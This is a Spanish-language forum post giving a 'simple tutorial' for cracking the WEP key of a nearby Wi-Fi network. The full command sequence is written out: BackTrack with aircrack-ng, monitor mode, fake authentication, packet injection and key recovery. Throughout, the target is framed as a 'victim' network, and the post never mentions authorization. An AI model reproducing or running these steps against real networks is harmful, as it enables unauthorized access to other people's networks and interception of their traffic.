Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - acidc00l

#1
Saludos  :laugh:

Bueno, aquí pongo mi granito de arena al foro ;)

Este sera un Tutorial SIMPLE para sacar claves WEP

1.- Descargar el CD de BackTrack (van por la versión 4.0 o ahi me quede yo  :silbar: )

2.- Grabar imagen.iso a CD o meter en PENDRIVE (Recomiendo GRABAR a CD)  >:D

3.- Resetear PC y arrancar el CD de BackTrack
Para ello tendremos que configurar nuestra BIOS o sino queremos calentarnos la cabeza  ;D , podemos usar la tecla F11 (en mi pc, en alguno es F8, TAB, ESC...) para iniciar en modo MENU BOOT

4.- Si pregunta por login, usaremos root y el password es toor, eso significa que tenemos problemas con la interfaz grafica, suele ser error del archivo xorg.conf situado en /etc/X11/xorg.conf

Para arreglarlo, simplemente copiaremos el backup que hay por el xorg.conf en uso
# cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf

Y probamos a iniciar la interfaz gráfica con startx

5.- Pasamos a configurar el Layout del teclado, pues esta en USA y 104 teclas.

Para ello pincharemos con el botón derecho del ratón en la bandera, al lado de la hora y seguidamente en configure

Cambiamos 104 teclas por 105 para ello miramos "arriba" y añadimos la bandera de nuestro país que están a la "izquierda" (en mi caso España).

6.- Abrimos 4 terminales
6.1.- En el terminal 1, averiguaremos que nombre tiene nuestra interfaz wlan.
Para ello usaremos el comando iwconfig

Mi wlan se llama wlan0 asi que a partir de ahora, esta sera la interfaz, tu tendrás que poner la tuya  ::)

7.- Ponemos nuestra interfaz wlan0 en modo monitor
# airmon-ng wlan0 start

8.- En busca de la victima...
8.1.- Nos vamos un momento al terminal 2 y averiguamos nuestra MAC
# macchanger -s wlan0

8.2.- Volvemos al terminal 1 e iniciamos la pesca
# airodump-ng --encrypt WEP wlan0

EXPLICACIÓN: --encrypt WEP (es para filtrar solo las redes con cifrado WEP)

En la lista, solo tendremos que fijarnos en 2 cosas: el PWR y la #data

Estos 2 factores, son cruciales para ahorrarnos tiempo, pues el PWR nos dice la fuerza de señal con la que nos llega la red y la #data si en este momento hay trafico, si es asi, presiona CTRL+C para parar la pesca.

8.3.- Concentrándonos en la víctima
# airodump-ng --encrypt WEP -c CANAL_VÍCTIMA -bssid MAC_VICTIMA -w hack wlan0

EXPLICACIÓN:
-c CANAL_VÍCTIMA (es el canal "channel" al lado de #data
-bssid MAC_VÍCTIMA (es la MAC de la víctima a la izquierda, es lo primero

9.- "Conectándonos a su red..."
9.1.- Nos vamos al terminal 2 y ponemos:
# aireplay-ng -1 6000 -a MAC_VICTIMA -h NUESTRA_MAC wlan0

Esperamos a la carita feliz :-)

10.- Inyectando (FORMA SIMPLE)
10.1.- Nos vamos al terminal 3 y ponemos:
# aireplay-ng -3 -b MAC_VICTIMA -h NUESTRA_MAC wlan0

Y esperamos a tener suerte y con el trafico de la víctima inyectaremos trafico para conseguir 50.000 #data (cuando tengamos 10.000 #data leemos el paso 12.1)
Si no inyecta trafico pasamos a la FORMA ATAQUE, si inyecta trafico, saltate el siguiente paso.

11.- Inyectando (FORMA ATAQUE)
11.1.-En el terminal 3 ponemos
# aireplay-ng -5 -a MAC_VÍCTIMA -h NUESTRA_MAC wlan0

Buscara paquetes y cuando nos pregunte, le ponemos "y" (sin las comillas) y nos creara un archivo.xor, este archivo.xor lo tenemos que transformar en nuestra "key"

# packetforge-ng -1 -y archivo.xor -a MAC_VÍCTIMA -c NUESTRA_MAC -h NUESTRA_MAC -l 192.168.0.1 -k 192.168.0.100 -w key

11.2.- Ahora cojemos nuestra key y atacamos
#aireplay-ng -2 -r key wlan0

Nos preguntara, le decimos "y" (sin las comillas)

12.- Cuando alcancemos la cifra de 50.000 #data...
12.1.- Nos vamos al terminal 4 y ponemos:
# aircrack-ng -s *.cap

Con suerte nos sacara la clave 100% decrypted correctly  ;-)

Y eso es todo amigos ;) un saludo y espero que les sirva mi experiencia a alguien =)

by acidc00l